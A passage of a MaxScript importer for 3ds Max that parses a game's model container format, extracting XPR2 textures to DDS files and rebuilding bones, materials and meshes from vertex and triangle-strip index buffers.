-- 00 00 00 02 00 00 00 02  00 00 00 05 00 00 00 00  00 00 00 05 00 00 00 01  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 01 00 00 00 01  00 00 00 01 00 00 00 00  00 00 00 00 41 40 00 00  BF 80 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 01
)
format "Vertex Count: %\nFace Count: %\n\n" geo_ukn27 geo_ukn29
append meshArray.vertex_counts geo_ukn29
append meshArray.face_counts geo_ukn27

append meshArray.vertex_start geo_ukn28
append meshArray.face_start geo_ukn26

append meshArray.subobj_index geo_ukn12
)
append objArray.modeldata meshArray
)  -- End Object Loop (2)



)
(x.tag[1]=="TTX"): ( -- XPR2 Resource, Buffer is located in TMCL @ 0x1000

-- TTX area has some node info, could be flags. largest problem is exhange of the layered textures.
if x.offsets[1]!=0 do (
fseek f (x.offsets[1]+x.adr[1]) #seek_set

xpr2_magic = readBElong f
xpr2_buffer_offset = readBElong f
xpr2_buffer_size = readBElong f
xpr2_buffer_count = readBElong f
for i = 1 to xpr2_buffer_count do (
append xpr2entry.magic (readBElong f)
append xpr2entry.offset (readBElong f)
append xpr2entry.size (readBElong f)
append xpr2entry.string_offset (readBElong f)
)
for i = 1 to xpr2_buffer_count do (
fseek f (xpr2entry.string_offset[i]+x.offsets[1]+x.adr[1]+12) #seek_set
append xpr2entry.string (readstring f)
)

-- fseek f (xpr2entry.offset[1]+(8*4)) #seek_set
-- tmcl_offset = readBEtriplet f

for i = 1 to xpr2_buffer_count do (
fseek f (xpr2entry.offset[i]+x.offsets[1]+x.adr[1]+12) #seek_set
append tx2dentry.ukn01 (readBElong f) -- 00 00 00 03
append tx2dentry.ukn02 (readBElong f) -- 0 00 00 01
append tx2dentry.ukn03 (readBElong f) -- 00 00 00 00
append tx2dentry.ukn04 (readBElong f) -- 00 00 00 00
append tx2dentry.ukn05 (readBElong f) -- 00 00 00 00
append tx2dentry.ukn06 (readBEshort f) -- FF FF
append tx2dentry.ukn07 (readBEshort f) -- 00 00
append tx2dentry.ukn08 (readBEshort f) -- FF FF
append tx2dentry.ukn09 (readBEshort f) -- 00 00
append tx2dentry.ukn10 (readbyte f #unsigned) -- 81
append tx2dentry.ukn11 (readbyte f #unsigned) -- 00
append tx2dentry.ukn12 (readbyte f #unsigned) -- 00
append tx2dentry.ukn13 (readbyte f #unsigned) -- 02
append tx2dentry.ukn14 (readBEtriplet f) -- base offset * 0x6000 from Buffer Start = Texture Offset
append tx2dentry.ukn15 (readbyte f #unsigned)  -- compression type
-- (byte 02 = CTES Compression {ETC RGBA Introploated Alpha 8bpp} dword: ETCI) /like DXT5
-- (byte 52 = dxt1)
-- (byte 53 = dxt3)
-- (byte 54 = dxt5)
-- (byte 56 = 32bitargb)
-- (byte 86 = 32bitargb)
-- (byte 4A) = 16bitargb)
-- (byte 71 = ATI2)
-- (byte 7C = ATI1 - CTX1) set to 54 to unswizzle
append tx2dentry.ukn16 (readBElong f) -- dimension
append tx2dentry.ukn17 (readBElong f) -- 00 00 0D 10
append tx2dentry.ukn18 (readBElong f) -- 00 00 00 0C
append tx2dentry.ukn19 (readBElong f) -- mip offset

)
)
-- for i = 1 to xpr2_buffer_count do (
-- format "Texture % @ 0x%\n" (i-1) ((bit.intAsHex((tx2dentry.ukn14[i] * 0x100)+xpr2_buffer_offset+12))as string))





if dumpXPR == true do(
s = fopen (fpath+fname+"_ttx.xpr") "wb"

writeBElong s xpr2_magic
writeBElong s xpr2_buffer_offset
writeBElong s xpr2_buffer_size
writeBElong s xpr2_buffer_count
for i = 1 to xpr2_buffer_count do (
writeBElong s xpr2entry.magic[i]
writeBElong s xpr2entry.offset[i]
writeBElong s xpr2entry.size[i]
writeBElong s xpr2entry.string_offset[i]
)
writeBElong s 0
for i = 1 to xpr2_buffer_count do (
writestring s xpr2entry.string[i]
)
writeBElong s 0
for i = 1 to xpr2_buffer_count do (
fseek f xpr2entry.offset[i] #seek_set
writeBElong s tx2dentry.ukn01[i]
writeBElong s tx2dentry.ukn02[i]
writeBElong s tx2dentry.ukn03[i]
writeBElong s tx2dentry.ukn04[i]
writeBElong s tx2dentry.ukn05[i]
writeBEshort s tx2dentry.ukn06[i]
writeBEshort s tx2dentry.ukn07[i]
writeBEshort s tx2dentry.ukn08[i]
writeBEshort s tx2dentry.ukn09[i]
writebyte s tx2dentry.ukn10[i] #unsigned
writebyte s tx2dentry.ukn11[i] #unsigned
writebyte s tx2dentry.ukn12[i] #unsigned
writebyte s tx2dentry.ukn13[i] #unsigned
writeBEtriplet s tx2dentry.ukn14[i]
writebyte s tx2dentry.ukn15[i] #unsigned
writeBElong s tx2dentry.ukn16[i]
writeBElong s tx2dentry.ukn17[i]
writeBElong s tx2dentry.ukn18[i]
writeBElong s tx2dentry.ukn19[i]
)

for i = 1 to ((xpr2_buffer_offset+12)-(ftell s)) do(writebyte s 99) -- pad remaning space

fseek l 0x1000 #seek_set
for i = 1 to xpr2_buffer_size do(writebyte s (readbyte l #unsigned) #unsigned)
print "XPR Write Complete!"
fclose s
)

if dumpDDS == true do(
tempArray=#()
for z = 1 to tx2dentry.ukn16.count do (
append tempArray (tx2dentry.ukn14[z]*0x0100)
)
deleteitem tempArray 1
append tempArray (xpr2_buffer_size)

print tempArray

for z = 1 to tx2dentry.ukn16.count do (
tempArray[z]=tempArray[z]-(tx2dentry.ukn14[z]*0x0100)
	
)

for z = 1 to tx2dentry.ukn16.count do (
texD=decodedimension tx2dentry.ukn16[z]

texC = tx2dentry.ukn15[z]
case of (
(texC==0x02): (texC="DXT5") -- CTES Compression {ETC RGBA Introploated Alpha 8bpp} dword: ETCI) /like DXT5
(texC==0x52): (texC="DXT1") -- dxt1
(texC==0x53): (texC="DXT3") -- dxt3
(texC==0x54): (texC="DXT5") -- dxt5
(texC==0x56): (texC="ARGB32") -- 32bitargb
(texC==0x86): (texC="ARGB32") -- 32bitargb
(texC==0x4A): (texC="ARGB16") -- 16bitargb
(texC==0x71): (texC="ATI2") -- ATI2
(texC==0x7C): (texC="ATI1") -- ATI1 - CTX1 set to 54 to unswizzle
default:(
format "Unknown Texture Compression: %\n" texC
texC="DXT1"
)
)
	
	
	
xpr2entry.string[z]=("0x"+(paddstring 8 (uppercase (bit.intAsHex((0x1000+(tx2dentry.ukn14[z]*0x0100)))))))

makeDir (fpath+fname)
	
if texD[4]==0 then (
s = fopen (fpath+fname+"\\"+(getFilenameFile xpr2entry.string[z]+"_"+texC+"_TX2D.dds")) "wb"
)else(
s = fopen (fpath+fname+"\\"+(getFilenameFile xpr2entry.string[z]+"_"+texC+"_TX3D.dds")) "wb"
)
	




if texD[4]==0 then (
writeDDSheader s texD[1] texD[2] 0 texC
)else (
writeDDSheader s texD[1] (texD[2]*2) 0 texC
)

fseek l (0x1000+(tx2dentry.ukn14[z]*0x0100)) #seek_set
if texD[4]==0 then(
case of (
(texC=="DXT1"): (for r = 1 to (tempArray[z]/2) do(writeshort s (ReadBEshort l) #unsigned))
(texC=="DXT3"): (for r = 1 to (tempArray[z]/2) do(writeshort s (ReadBEshort l) #unsigned))
(texC=="DXT5"): (for r = 1 to (tempArray[z]/2) do(writeshort s (ReadBEshort l) #unsigned))
(texC=="ATI1"): (for r = 1 to (tempArray[z]/2) do(writeshort s (ReadBEshort l) #unsigned))
(texC=="ATI2"): (for r = 1 to (tempArray[z]/2) do(writeshort s (ReadBEshort l) #unsigned))
(texC=="ARGB16"): (for r = 1 to tempArray[z] do(writebyte s (readbyte l #unsigned) #unsigned))
(texC=="ARGB32"): (for r = 1 to tempArray[z] do(writebyte s (readbyte l #unsigned) #unsigned))
)
)else(
case of (
(texC=="DXT1"): (
for c = 1 to (tempArray[z]/8192) do(
for r = 1 to (8192/2) do (writeshort s (ReadBEshort l) #unsigned)
fseek l 8192 #seek_cur))
(texC=="DXT3"): (
for c = 1 to (tempArray[z]/16384) do(
for r = 1 to (16384/2) do (writeshort s (ReadBEshort l) #unsigned)
fseek l 16384 #seek_cur))
(texC=="DXT5"): (
for c = 1 to (tempArray[z]/16384) do(
for r = 1 to (16384/2) do (writeshort s (ReadBEshort l) #unsigned)
fseek l 16384 #seek_cur))
(texC=="ATI1"): (
for c = 1 to (tempArray[z]/8192) do(
for r = 1 to (8192/2) do (writeshort s (ReadBEshort l) #unsigned)
fseek l 8192 #seek_cur))
(texC=="ATI2"): (
for c = 1 to (tempArray[z]/16384) do(
for r = 1 to (16384/2) do (writeshort s (ReadBEshort l) #unsigned)
fseek l 16384 #seek_cur))
(texC=="ARGB16"): (for r = 1 to tempArray[z] do(writebyte s (readbyte l #unsigned) #unsigned))
(texC=="ARGB32"): (for r = 1 to tempArray[z] do(writebyte s (readbyte l #unsigned) #unsigned))
)
)





fclose s
)
print "XPR Write Complete!"
)
)
(x.tag[1]=="VtxLay"): (
-- fseek f x.adr[1] #seek_set
VtxLayArray.offset = copy x.offsets #nomap
)
(x.tag[1]=="IdxLay"): (
IdxLayArray.offset = copy x.offsets #nomap
)
(x.tag[1]=="MtrCol"): (  -- Material Colour?
loopchildren x f

for i = 1 to x.offsets.count do(
fseek f (x.offsets[i]+x.adr[1]) #seek_set
printblockpos ("MtrCol "+(i as string)) (x.offsets[i]+x.adr[1]+0xA76600)
mtr_ukn01 = readcol f -- Diffuse Colour?
mtr_ukn02 = readcol f
mtr_ukn03 = readcol f
mtr_ukn04 = readcol f
mtr_ukn05 = readcol f
mtr_ukn06 = readcol f
mtr_ukn07 = readBElong f -- Reserved Memory Space
fseek f (getpadding (ftell f) 16) #seek_cur
mtr_ukn08 = readcol f -- Diffuse Colour?
mtr_ukn09 = readcol f
mtr_ukn10 = readcol f
mtr_ukn11 = readcol f
mtr_ukn12 = readcol f
mtr_ukn13 = readcol f

-- for i = 1 to 1 do (
-- mtr_ukn14 = readBElong f
-- mtr_ukn15 = readBElong f
-- )
)
)
(x.tag[1]=="MdlInfo"): ( -- Same as ObjGeo Count
loopchildren x f

for i = 1 to x.offsets.count do(
fseek f (x.offsets[i]+x.adr[1]+0xE0) #seek_set

-- printblockpos "MODEL INFO" ((ftell f)+0xA76600)

p01=readBEfloat f
p02=readBEfloat f
p03=readBEfloat f
p04=readBEfloat f

p05=readBEfloat f
p06=readBEfloat f
p07=readBEfloat f
p08=readBEfloat f

p09=readBEfloat f
p10=readBEfloat f
p11=readBEfloat f
p12=readBEfloat f

p13=readBEfloat f
p14=readBEfloat f
p15=readBEfloat f
p16=readBEfloat f

p17=readBEfloat f
p18=readBEfloat f
p19=readBEfloat f
p20=readBEfloat f

p21=readBEfloat f
p22=readBEfloat f
p23=readBEfloat f
p24=readBEfloat f

p25=readBEfloat f
p26=readBEfloat f
p27=readBEfloat f
p28=readBEfloat f




if drawp == true do (
bb = sphere();bb.radius=3 -- RED
bb.position=[p01,-p03,p02]*model_scale
bb.wirecolor = color 255 0 0
bb.name = ("SPHERE_01_"+(paddstring 2 (i as string)))
	
bb = sphere();bb.radius=3 -- GREEN
bb.position=[p05,-p07,p06]*model_scale
bb.wirecolor = color 0 75 0
bb.name = ("SPHERE_02_"+(paddstring 2 (i as string)))
	
bb = sphere();bb.radius=3 -- BLUE
bb.position=[p09,-p11,p10]*model_scale
bb.wirecolor = color 0 0 255
bb.name = ("SPHERE_03_"+(paddstring 2 (i as string)))
	
bb = sphere();bb.radius=3 -- ORANGE
bb.position=[p13,-p15,p14]*model_scale
bb.wirecolor = color 239 68 0
bb.name = ("SPHERE_04_"+(paddstring 2 (i as string)))
	
bb = sphere();bb.radius=3 -- PINK
bb.position=[p17,-p19,p18]*model_scale
bb.wirecolor = color 255 0 216	
bb.name = ("SPHERE_05_"+(paddstring 2 (i as string)))
	
bb = sphere();bb.radius=3 -- AQUA
bb.position=[p21,-p23,p22]*model_scale
bb.wirecolor = color 0 240 198	
bb.name = ("SPHERE_06_"+(paddstring 2 (i as string)))
	
bb = sphere();bb.radius=3 -- LIME
bb.position=[p21,-p23,p22]*model_scale
bb.wirecolor = color 98 246 0
bb.name = ("SPHERE_07_"+(paddstring 2 (i as string)))
)
	
	
	
	
	
-- for y = 1 to x.children[i].offsets.count do(
-- fseek f (x.children[i].offsets[y]+x.children[i].adr[1]) #seek_set
	




-- mfn_ukn01 = ReadBElong f -- Object Index
-- mfn_ukn01 = ReadBElong f -- ?? 
-- mfn_ukn01 = ReadBElong f -- always 0?
-- mfn_ukn01 = ReadBElong f -- always 0?
-- mfn_ukn01 = ReadBElong f -- always 0?
-- mfn_ukn01 = ReadBElong f -- always 0?
-- mfn_ukn01 = ReadBElong f -- always 0?
-- mfn_ukn01 = ReadBElong f -- always 0?
-- mfn_ukn01 = ReadBElong f -- reserved memory space
-- mfn_ukn01 = ReadBElong f -- padding?
-- mfn_ukn01 = ReadBElong f -- padding?
-- mfn_ukn01 = ReadBElong f -- padding?









-- )
)
)
(x.tag[1]=="HieLay"): (  -- Bones
for i = 1 to x.offsets.count do ( -- bone entry is 112bytes
fseek f (x.offsets[i]+x.adr[1]) #seek_set
	


bone_row1 = [(readBEfloat f),(readBEfloat f),(readBEfloat f),(readBEfloat f)]
bone_row2 = [(readBEfloat f),(readBEfloat f),(readBEfloat f),(readBEfloat f)]
bone_row3 = [(readBEfloat f),(readBEfloat f),(readBEfloat f),(readBEfloat f)]
bone_row4 = [(readBEfloat f),(readBEfloat f),(readBEfloat f),(readBEfloat f)]
-- mScaleX		mRotateZa		mRotateYa
-- mRotateZb	mScaleY		mRotateXa
-- mRotateYb	mRotateXb		mScaleZ
-- mMoveX		mMoveZ			mMoveY
bone_transform = (matrix3 \
([(bone_row1[1]),(bone_row1[2]),(bone_row1[3])]) \
([(bone_row2[1]),(bone_row2[2]),(bone_row2[3])]) \
([(bone_row3[1]),(bone_row3[2]),(bone_row3[3])]) \
([(bone_row4[1]),(bone_row4[2]),(bone_row4[3])]*bone_row4[4]*model_scale))

bone_parent = (readBElong f)+1
bone_chlidren_count = readBElong f

bone_ukn01 = readBElong f
bone_ukn02 = readBElong f

format "Bone: %\n\t>>% %\n" i bone_ukn01 bone_ukn02

bone_chlidren = #()
for i = 1 to bone_chlidren_count do (append bone_chlidren ((readBElong f)+1))
append boneArray.name ("Bone_"+(paddstring 3 (i as string)))
append boneArray.matrix bone_transform
append boneArray.parent bone_parent
append boneArray.children bone_chlidren
)




)
(x.tag[1]=="LHeader"): ( -- TMCL Info
-- Sub Buffers are on 0x1000 alignment
-- Given Size doesn't include padding
-- fseek f adr #seek_set
print (x.offsets[1]+x.adr[1])
	
for i = 1 to x.offsets.count do (
append tmclBuffer.offset x.offsets[i]
)
for i = 1 to x.sizes.count do (
append tmclBuffer.size x.sizes[i]
)
-- tmclBuffer
)
(x.tag[1]=="NodeLay"): (  -- Bone Names
-- expects "HieLay" to have been read in first
for i = 1 to x.offsets.count do ( -- bone entry is 112bytes
fseek f (x.offsets[i]+x.adr[1]+0x30) #seek_set
NodeLay_01 = readBElong f -- always 0? flag for bones?
NodeLay_02 = readBElong f -- always -1?
NodeLay_03 = readBElong f + 1 -- Index
NodeLay_04 = readBElong f -- reversed memory address
NodeLay_05 = readstring f
-- pad to 16byte alignment
boneArray.name[NodeLay_03]=NodeLay_05
format "Node: %\n\t>>% % %\n" NodeLay_05 NodeLay_01 NodeLay_02 NodeLay_03
)
)
(x.tag[1]=="xGlblMtx"): (  -- same as "HieLay"? but no parenting info
)
(x.tag[1]=="xBnOfsMtx"): (  -- same as "HieLay"? but no parenting info
)
(x.tag[1]=="xcpf"): (  -- ?? bone related
)
(x.tag[1]=="xMCAPACK"): (  -- ?? material related?
for i = 1 to x.offsets.count do( -- block dont follow my previous understanding :/
fseek f (x.offsets[i]+x.adr[1]) #seek_set
-- format "MCAMTRL @ 0x%\n" ((bit.intAsHex(ftell f))as string)
fseek f 0x14 #seek_cur
mcam_count1 = readBElong f -- count duplicated in "ACSCLS" section
mcam_count2 = readBElong f -- ?
fseek f 0x14 #seek_cur
mcam_count2_array = #()
for y = 1 to mcam_count1 do ( -- alot of white space?
mcam_offset1 = readBElong f

if mcam_offset1!=0 do(
append mcam_count2_array (mcam_offset1+x.offsets[i]+x.adr[1])

)
)
MCAPARAMARRAY2 = #()
for x = 1 to mcam_count2_array.count do (
fseek f (mcam_count2_array[x]+0x30) #seek_set
-- format "MCAPARAM @ 0x%\n" ((bit.intAsHex(ftell f-0x30))as string)
-- append MCAPARAMARRAY2 [(readBElong f),(readBElong f),(readBElong f),(readBElong f)]
append MCAPARAMARRAY2 (readBElong f)



)
append MCAPARAMARRAY.ukn1 MCAPARAMARRAY2
)
-- print MCAPARAMARRAY
)
(x.tag[1]=="xRENPACK"): (  -- block is empty ?
)
(x.tag[1]=="xACSCLS"): ( -- ??parsing of this area is incorrect
loopchildren x f

for i = 1 to x.offsets.count do(
fseek f (x.offsets[i]+x.adr[1]) #seek_set
-- format "SACL @ 0x%\n" ((bit.intAsHex(ftell f))as string)
-- print x.children[i].offsets.count

for y = 1 to x.children[i].offsets.count do(
fseek f (x.children[i].offsets[y]+x.children[i].adr[1]) #seek_set
	




mfn_ukn01 = ReadBElong f -- Object Index
mfn_ukn01 = ReadBElong f -- ?? 
mfn_ukn01 = ReadBElong f -- always 0?
mfn_ukn01 = ReadBElong f -- always 0?
mfn_ukn01 = ReadBElong f -- always 0?
mfn_ukn01 = ReadBElong f -- always 0?
mfn_ukn01 = ReadBElong f -- always 0?
mfn_ukn01 = ReadBElong f -- always 0?
mfn_ukn01 = ReadBElong f -- reserved memory space
mfn_ukn01 = ReadBElong f -- padding?
mfn_ukn01 = ReadBElong f -- padding?
mfn_ukn01 = ReadBElong f -- padding?









)
)
)
default: (format "*New Block: %\n" x.tag[1])
)
)

)
default:()
)



if buildMsh == true do ( -- build mesh


for i = 1 to boneArray.name.count do ( -- Create Bones
bone_ext = [0,0,0]
if boneArray.parent[i]!=0 do (bone_ext = boneArray.matrix[(boneArray.parent[i])].row4)
bb=BoneSys.createBone boneArray.matrix[i].row4 bone_ext [0,0,1]
bb.showLinks = true
bb.showLinksOnly = true
bb.transform = boneArray.matrix[i]
bb.name = boneArray.name[i]
append boneArray.obj bb
)

for i = 1 to boneArray.name.count do ( -- realtive to world positions
if boneArray.parent[i]!=0 then (
boneArray.obj[i].transform*= boneArray.obj[(boneArray.parent[i])].transform
boneArray.obj[i].parent = boneArray.obj[(boneArray.parent[i])]
)else(boneArray.obj[i].transform=rotateX boneArray.obj[i].transform 90
)
)

-- clearlistener()

-- try (
for i = 1 to objArray.modeldata.count do ( -- Mesh Count
-- for i = 1 to 1 do ( -- Mesh Count
format ">>>>>>>NEW OBJECT: %\n" i
num_elements = objArray.modeldata[i].vertex_start.count
-- num_elements = 3
faceaddon = 1

vertArray=#()
normArray=#()
uvwArray1=#()
uvwArray2=#()
uvwArray3=#()
uvwArray4=#()
faceArray=#()
matidArray=#()
logArray1=#()
logArray2=#()
logArray3=#()


mat = multimaterial numsubs:num_elements
mat.numsubs = num_elements
for x = 1 to num_elements do ( -- Mesh Elements



num_verts = objArray.modeldata[i].vertex_counts[x]
	
	
format "Number Vertices: %\n" num_verts
	
pos = tmclBuffer.offset[2] + VtxLayArray.offset[(objArray.modeldata[i].vertex_type[(objArray.modeldata[i].subobj_index[x]+1)]+1)]
stride = objArray.modeldata[i].vertex_stride[(objArray.modeldata[i].subobj_index[x]+1)]
pos += objArray.modeldata[i].vertex_start[x]*stride

-- append logArray [stride,num_verts,pos] -- here for quick vertex injection
	append logArray1 stride -- here for quick vertex injection
	append logArray2 num_verts -- here for quick vertex injection
	append logArray3 pos
	
format "Mesh Index: %\n" (objArray.modeldata[i].subobj_index[x]+1)
case of (
(stride==16): (
for v = 1 to num_verts do (
fseek l pos #seek_set

vx = ReadBEfloat l
vy = ReadBEfloat l
vz = ReadBEfloat l

tu1 = readBEHalfFloat l
tv1 = readBEHalfFloat l

-- ReadBE_HEND3N fstream

append vertArray ([vx,-vz,vy]*model_scale)
append uvwArray1 [(1-tu1),(1-tv1),0]
append uvwArray2 [0,0,0]
append uvwArray3 [0,0,0]
append uvwArray4 [0,0,0]

-- append vertArray [0,0,0]
-- append uvwArray1 [0,0,0]
-- append uvwArray2 [0,0,0]
-- append uvwArray3 [0,0,0]
-- append uvwArray4 [0,0,0]

pos += stride
)
)
(stride==24): (
for v = 1 to num_verts do (
fseek l pos #seek_set

vx = ReadBEfloat l
vy = ReadBEfloat l
vz = ReadBEfloat l

nx = ReadBEfloat l
nx = ReadBEfloat l

tu1 = readBEHalfFloat l
tv1 = readBEHalfFloat l



append vertArray ([vx,-vz,vy]*model_scale)
append uvwArray1 [(1-tu1),(1-tv1),0]
append uvwArray2 [0,0,0]
append uvwArray3 [0,0,0]
append uvwArray4 [0,0,0]

-- append vertArray [0,0,0]
-- append uvwArray1 [0,0,0]
-- append uvwArray2 [0,0,0]
-- append uvwArray3 [0,0,0]
-- append uvwArray4 [0,0,0]

pos += stride
)
)
(stride==28): ( -- not verified! 2 unknowns
for v = 1 to num_verts do (
fseek l pos #seek_set

vx = ReadBEfloat l
vy = ReadBEfloat l
vz = ReadBEfloat l

nx = ReadBEfloat l
nx = ReadBEfloat l

ukn1 = readBEHalfFloat l
ukn1 = readBEHalfFloat l

tu1 = readBEHalfFloat l
tv1 = readBEHalfFloat l



append vertArray ([vx,-vz,vy]*model_scale)
append uvwArray1 [(1-tu1),(1-tv1),0]
append uvwArray2 [0,0,0]
append uvwArray3 [0,0,0]
append uvwArray4 [0,0,0]

-- append vertArray [0,0,0]
-- append uvwArray1 [0,0,0]
-- append uvwArray2 [0,0,0]
-- append uvwArray3 [0,0,0]
-- append uvwArray4 [0,0,0]

pos += stride
)
)
(stride==32): (
for v = 1 to num_verts do (
fseek l pos #seek_set

vx = ReadBEfloat l
vy = ReadBEfloat l
vz = ReadBEfloat l

nx = ReadBEfloat l
nx = ReadBEfloat l	
	
tu1 = readBEHalfFloat l
tv1 = readBEHalfFloat l	

tu2 = readBEHalfFloat l
tv2 = readBEHalfFloat l

tu3 = readBEHalfFloat l
tv3 = readBEHalfFloat l



append vertArray ([vx,-vz,vy]*model_scale)
append uvwArray1 [(1-tu1),(1-tv1),0]
append uvwArray2 [(1-tu2),(1-tv2),0]
append uvwArray3 [(1-tu3),(1-tv3),0]
append uvwArray4 [0,0,0]

-- append vertArray [0,0,0]
-- append uvwArray1 [0,0,0]
-- append uvwArray2 [0,0,0]
-- append uvwArray3 [0,0,0]
-- append uvwArray4 [0,0,0]

pos += stride
)
)
(stride==36): ( -- not verified! 4 unknowns
for v = 1 to num_verts do (
fseek l pos #seek_set

vx = ReadBEfloat l
vy = ReadBEfloat l
vz = ReadBEfloat l

nx = ReadBEfloat l
nx = ReadBEfloat l	

ukn1 = readBEHalfFloat l
ukn2 = readBEHalfFloat l

ukn3 = readBEHalfFloat l
ukn4 = readBEHalfFloat l
	
tu1 = readBEHalfFloat l
tv1 = readBEHalfFloat l	

tu2 = readBEHalfFloat l
tv2 = readBEHalfFloat l

append vertArray ([vx,-vz,vy]*model_scale)
append uvwArray1 [(1-tu1),(1-tv1),0]
append uvwArray2 [(1-tu2),(1-tv2),0]
append uvwArray3 [0,0,0]
append uvwArray4 [0,0,0]

-- append vertArray [0,0,0]
-- append uvwArray1 [0,0,0]
-- append uvwArray2 [0,0,0]
-- append uvwArray3 [0,0,0]
-- append uvwArray4 [0,0,0]

pos += stride
)
)
(stride==40): (
for v = 1 to num_verts do (
fseek l pos #seek_set

vx = ReadBEfloat l
vy = ReadBEfloat l
vz = ReadBEfloat l

nx = ReadBEfloat l

w4 = readbyte l #unsigned
w3 = readbyte l #unsigned
w2 = readbyte l #unsigned
w1 = readbyte l #unsigned
b4 = readbyte l #unsigned
b3 = readbyte l #unsigned
b2 = readbyte l #unsigned
b1 = readbyte l #unsigned

nx = ReadBEfloat l	

tu1 = readBEHalfFloat l
tv1 = readBEHalfFloat l

tu2 = readBEHalfFloat l
tv2 = readBEHalfFloat l

tu3 = readBEHalfFloat l
tv3 = readBEHalfFloat l


append vertArray ([vx,-vz,vy]*model_scale)
append uvwArray1 [(1-tu1),(1-tv1),0]
append uvwArray2 [(1-tu2),(1-tv2),0]
append uvwArray3 [(1-tu3),(1-tv3),0]
append uvwArray4 [0,0,0]

-- append vertArray [0,0,0]
-- append uvwArray1 [0,0,0]
-- append uvwArray2 [0,0,0]
-- append uvwArray3 [0,0,0]
-- append uvwArray4 [0,0,0]

pos += stride
)
)
(stride==44): (
for v = 1 to num_verts do (
fseek l pos #seek_set

vx = ReadBEfloat l
vy = ReadBEfloat l
vz = ReadBEfloat l

nx = ReadBEfloat l

w4 = readbyte l #unsigned
w3 = readbyte l #unsigned
w2 = readbyte l #unsigned
w1 = readbyte l #unsigned
b4 = readbyte l #unsigned
b3 = readbyte l #unsigned
b2 = readbyte l #unsigned
b1 = readbyte l #unsigned

nx = ReadBEfloat l	

tu1 = readBEHalfFloat l
tv1 = readBEHalfFloat l

tu2 = readBEHalfFloat l
tv2 = readBEHalfFloat l

tu3 = readBEHalfFloat l
tv3 = readBEHalfFloat l

tu4 = readBEHalfFloat l
tv4 = readBEHalfFloat l


append vertArray ([vx,-vz,vy]*model_scale)
-- append vertArray [nx,-nz,ny]
append uvwArray1 [(1-tu1),(1-tv1),0]
append uvwArray2 [(1-tu2),(1-tv2),0]
append uvwArray3 [(1-tu3),(1-tv3),0]
append uvwArray4 [(1-tu4),(1-tv4),0]

-- append vertArray [0,0,0]
-- append uvwArray [0,0,0]

pos += stride
)
)
(stride==96): (
for v = 1 to num_verts do (
fseek l pos #seek_set

vx = ReadBEfloat l
vy = ReadBEfloat l
vz = ReadBEfloat l

nx = ReadBEfloat l

w4 = readbyte l #unsigned
w3 = readbyte l #unsigned
w2 = readbyte l #unsigned
w1 = readbyte l #unsigned
b4 = readbyte l #unsigned
b3 = readbyte l #unsigned
b2 = readbyte l #unsigned
b1 = readbyte l #unsigned

nx = ReadBEfloat l	

tu1 = readBEHalfFloat l
tv1 = readBEHalfFloat l

tu2 = readBEHalfFloat l
tv2 = readBEHalfFloat l

tu3 = readBEHalfFloat l
tv3 = readBEHalfFloat l

tu4 = readBEHalfFloat l
tv4 = readBEHalfFloat l


append vertArray ([vx,-vz,vy]*model_scale)
-- append vertArray [nx,-nz,ny]
append uvwArray1 [(1-tu1),(1-tv1),0]
append uvwArray2 [(1-tu2),(1-tv2),0]
append uvwArray3 [(1-tu3),(1-tv3),0]
append uvwArray4 [(1-tu4),(1-tv4),0]

-- append vertArray [0,0,0]
-- append uvwArray [0,0,0]

pos += stride
)
)
default:(
format "New Stride (%) @ 0x%\n" stride ((bit.intAsHex(pos))as string)
messagebox ("Yay, You've Discovered a New Vertex Size!\nHelp solve the FVF flags by telling me which file this failed on :-)")
)
)
pos+=getpadding (pos) 8
)
for x = 1 to num_elements do ( -- Mesh Elements
pos = tmclBuffer.offset[3] + IdxLayArray.offset[(objArray.modeldata[i].vertex_type[(objArray.modeldata[i].subobj_index[x]+1)]+1)]
pos += objArray.modeldata[i].face_start[x]*0x02
num_faces = objArray.modeldata[i].face_counts[x]
fseek l pos #seek_set

-- format "Face START @ 0x%\n" ((bit.intAsHex(ftell l))as string)
-- format "Start face: % \n" objArray.modeldata[i].face_start[x]
-- faceaddon = 
	
	
StartDirection = -1
fa =((readBEshort l)-objArray.modeldata[i].vertex_start[x]) + faceaddon
fb =((readBEshort l)-objArray.modeldata[i].vertex_start[x]) + faceaddon
FaceDirection = StartDirection
IndexCounter = 2
Do (
fc =(readBEshort l)
IndexCounter += 1
if (fc==0xFFFF) then (
fa =((readBEshort l)-objArray.modeldata[i].vertex_start[x]) + faceaddon
fb =((readBEshort l)-objArray.modeldata[i].vertex_start[x]) + faceaddon
FaceDirection = StartDirection
IndexCounter += 2
) else (
fc-=objArray.modeldata[i].vertex_start[x]
fc += faceaddon
FaceDirection *= -1
if (fa!=fb)AND(fb!=fc)AND(fc!=fa) then (
if FaceDirection > 0 then (append faceArray [fa,fb,fc];append matidArray x)
else (append faceArray [fa,fc,fb];append matidArray x)
)
fa = fb
fb = fc
)
)
while IndexCounter !=num_faces
faceaddon += objArray.modeldata[i].vertex_counts[x]
-- faceaddon -= objArray.modeldata[i].face_start[x]
-- print faceArray[1]
-- print faceArray[2]
-- print faceArray[3]

-- faceArray=#()


-- format "Face Ended @ 0x%\n" ((bit.intAsHex(ftell l))as string)
-- format "VertCount: %\n" vertArray.count
)



msh = mesh vertices:vertArray faces:faceArray materialIDs:matidArray
msh.numTVerts = uvwArray1.count
buildTVFaces msh
msh.displayByLayer = false
msh.backfacecull = on
msh.wirecolor = random (color 0 0 0) (color 255 255 255)
msh.material = mat
for j = 1 to msh.material.count do 
	(msh.material.materialList[j].Diffuse = random (color 0 0 0) (color 255 255 255))
for j = 1 to uvwArray1.count do setTVert msh j uvwArray1[j]
for j = 1 to faceArray.count do setTVFace msh j faceArray[j]
-- for j = 1 to normArray.count do setNormal msh j normArray[j]

if uvwArray2.count!=0 do(meshop.setNumMaps msh 3 keep:true
for j = 1 to uvwArray2.count do (meshOp.setMapVert msh 2 j uvwArray2[j]))
if uvwArray3.count!=0 do(meshop.setNumMaps msh 4 keep:true
for j = 1 to uvwArray3.count do (meshOp.setMapVert msh 3 j uvwArray3[j]))
if uvwArray3.count!=0 do(meshop.setNumMaps msh 5 keep:true
for j = 1 to uvwArray4.count do (meshOp.setMapVert msh 4 j uvwArray3[j]))

setUserProp msh "mesh_data" #(logArray1,logArray2,logArray3)


)
-- )catch(print "Error,Failed to Draw Meshes")
)



















format "Last Read @ 0x%\n" ((bit.intAsHex(ftell f))as string)
fclose l
fclose f
